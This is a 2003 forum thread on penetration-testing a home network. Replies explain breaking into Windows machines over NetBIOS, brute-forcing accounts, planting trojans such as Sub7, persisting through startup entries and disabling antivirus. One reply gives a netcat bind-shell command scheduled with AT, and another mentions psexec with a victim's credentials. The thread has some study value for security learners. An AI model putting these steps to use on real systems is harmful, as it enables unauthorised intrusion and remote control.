March 27th, 2003, 08:27 PM
Hi all. I have a home network comprised of 4 computers and I am wanting to start some penetration testing on them. I read some tutorials on the NetBios exploit to map a shared drive or folder and I understand that part. My question is How do I remotely run a program on one of the computers from another. i.e. planting a trojan on one of the computers and running the server on that computer remotely from another computer. Im sure this is a newbie question, but I have read tutorials and have not seemed to be able to find one that explains it that far. So basically I am wanting to see if I can use NetBios to break into my other computers and plant a trojan then be able to run the sever on that computer from another computer. Thanks for the help!
March 27th, 2003, 08:39 PM
Well let me ask you this, "Have you looked into NetBIOS vulnerabilities and enumberation techniques?"
If you have, then you can start by brute forcing enumerated accounts on these boxes. Once you have compromised a box, you can easily get the trojan on the machine and then run your remote console.
I'd grab Sub7 and use that for your testing. That should produce good results. Just google it.
Our scars have the power to remind us that our past was real. -- Hannibal Lecter.
Talent is God given. Be humble. Fame is man-given. Be grateful. Conceit is self-given. Be careful. -- John Wooden
March 27th, 2003, 08:43 PM
I've done this on my network too... but not much. It got rather boring.
I put the server part of the trojan in a popular startup location. You can put it anywhere and have a shortcut to it added in the registry or in the startup folder. If you put a script to add a startup key into the registry from the startup folder, you will have to wait 2 reboots. If you just put a shortcut in the startup folder, you only have to wait for one reboot.
If they are running a terminal services such as remote desktop, telnet, ssh, etc. You can run commands remotely. If not, you'd have to exploit a service that has not been patched and allows you to take full control of the system or run certain commands...
Just remember to disable your antivirus as it'll catch it right away. That is unless you created your own trojan and aren't using one you downloaded.
March 27th, 2003, 08:45 PM
Well, your definetly pushing the edge on this question. But since its your "home network comprised of 4 computers" I guess I could shed a bit of light, without going to far.
Well Once you learn how to map the other drive (c$) then you pretty much have control of the computer. Thru the explorer you can edit/create/delete any files you need. So.. from here you could pretty much do anything you want. To run a program you have several options. Just think about what gets run each time your computer starts. Where are these programs called from. (registry, autoexec, batch files, etc..)
Well, this is computer knowledge. I myself have trojaned my boxes with countless type of trojans virii just to see how these things work. Its great experience for those getting into security. If you learn the methods these programs use to take control, you can easily defeat them. Just be sure your doing this to a test box and not your mom or dads work computer. I'm sure they won't be to happy. Also be sure to put up a firewall on the main connection. Most trojans have backdoors for everyone using that trojan. Some even have the ability to take down firewalls and spread thru netbios, etc. So just make sure you have a secure testing platform.
March 27th, 2003, 09:05 PM
To answer you question HyperFlash, if your trying to run a command on a remote machine on your lan you can do the following: First, I'm going to assume that you have a valid account on the remote machine, from there, you have several different avenues to travel, you should probably start by copying NC (Net Cat) over to a system folder (%systemdrive%\winnt\system32 or %systemdrive%\windows\system32), then use the AT command ( AT time:to_run /every:M,T,W,TH,F,S,SU "your_command_here" use help for proper usage) to remotely schedule Net Cat to run, you can set parameters (nc -L -d -p [port] -t -e cmd.exe) in your Net Cat command argument so that when you telnet to the port you set Net Cat to listen to it will throw you a phat command prompt. You might want to run net time to find out the time on the remote machine before you start to schedule. Hope this helps in your Pen testing endevours
March 27th, 2003, 11:22 PM
psexex.exe from "pstools" lets you run programs remotely (if you have the user/pass from the "victim")